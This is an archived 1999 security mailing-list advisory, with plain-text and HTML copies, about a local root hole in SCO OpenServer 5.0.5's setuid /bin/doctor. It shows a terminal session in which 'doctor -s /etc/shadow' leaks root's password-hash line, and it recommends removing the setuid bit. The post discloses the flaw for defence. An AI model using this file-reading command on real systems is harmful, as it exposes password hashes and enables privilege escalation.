SCO 5.0.5 /bin/doctor local root comprimise

From: Brock Tellier (btellierat_private)
Date: Fri Sep 03 1999 - 15:20:17 PDT

Next message: Alan Brown: "Re: NetBSD 1.4.1 local DoS"

Previous message: Tim Dierks: "Re: NSA key in MSFT Crypto API"
Next in thread: Seth R Arnold: "Re: SCO 5.0.5 /bin/doctor local root comprimise"
Reply: Seth R Arnold: "Re: SCO 5.0.5 /bin/doctor local root comprimise"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.

------=_NextPart_000_040F_01BEF630.977394B0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Greetings,


INFO:
 There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and =
probably others.  By supplying a doctor script file you can read the =
first partial line of any file on the system (good enough for =
/etc/shadow).  Example:

scobox:/bin$ id
uid=3D136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name =
"root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX:=20
 Just chmod -s until SCO comes out with a fix.  Although I certianly =
won't be changing it back to suid root anytime soon.  If a hole like =
this exists, there are undoubtedly countless more lurking within. =20

Brock Tellier
Systems Administrator
Webley Systems

------=_NextPart_000_040F_01BEF630.977394B0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><BR>INFO:<BR>&nbsp;There is a local =
root comprimise=20
in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.&nbsp; By =
</FONT><FONT=20
face=3DArial size=3D2>supplying a doctor script file you can read the =
first partial=20
line of any file on the system (good </FONT><FONT face=3DArial =
size=3D2>enough for=20
/etc/shadow).&nbsp; Example:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>scobox:/bin$=20
id<BR>uid=3D136(btellier),200(users)<BR>scobox:/bin$ uname -a<BR>SCO_SV =
scobox 3.2=20
5.0.5 i386<BR>scobox:/bin$ doctor -V<BR>doctor 2.0.0e 2<BR>scobox:/bin$ =
doctor=20
-s /etc/shadow<BR>doctor: WARNING User message: invalid command name=20
"root:xbfOLR0ekXN/o:10656::"<BR>scobox:/bin$</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>And so on.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>FIX: <BR>&nbsp;Just chmod -s until SCO =
comes out=20
with a fix.&nbsp; Although I certianly won't be changing it back to =
</FONT><FONT=20
face=3DArial size=3D2>suid root anytime soon.&nbsp; If a hole like this =
exists,=20
there are undoubtedly countless more lurking </FONT><FONT face=3DArial=20
size=3D2>within.&nbsp; </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Brock Tellier<BR>Systems =
Administrator<BR>Webley=20
Systems</FONT></DIV></BODY></HTML>

------=_NextPart_000_040F_01BEF630.977394B0--

Next message: Alan Brown: "Re: NetBSD 1.4.1 local DoS"
Previous message: Tim Dierks: "Re: NSA key in MSFT Crypto API"
Next in thread: Seth R Arnold: "Re: SCO 5.0.5 /bin/doctor local root comprimise"
Reply: Seth R Arnold: "Re: SCO 5.0.5 /bin/doctor local root comprimise"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:46 PDT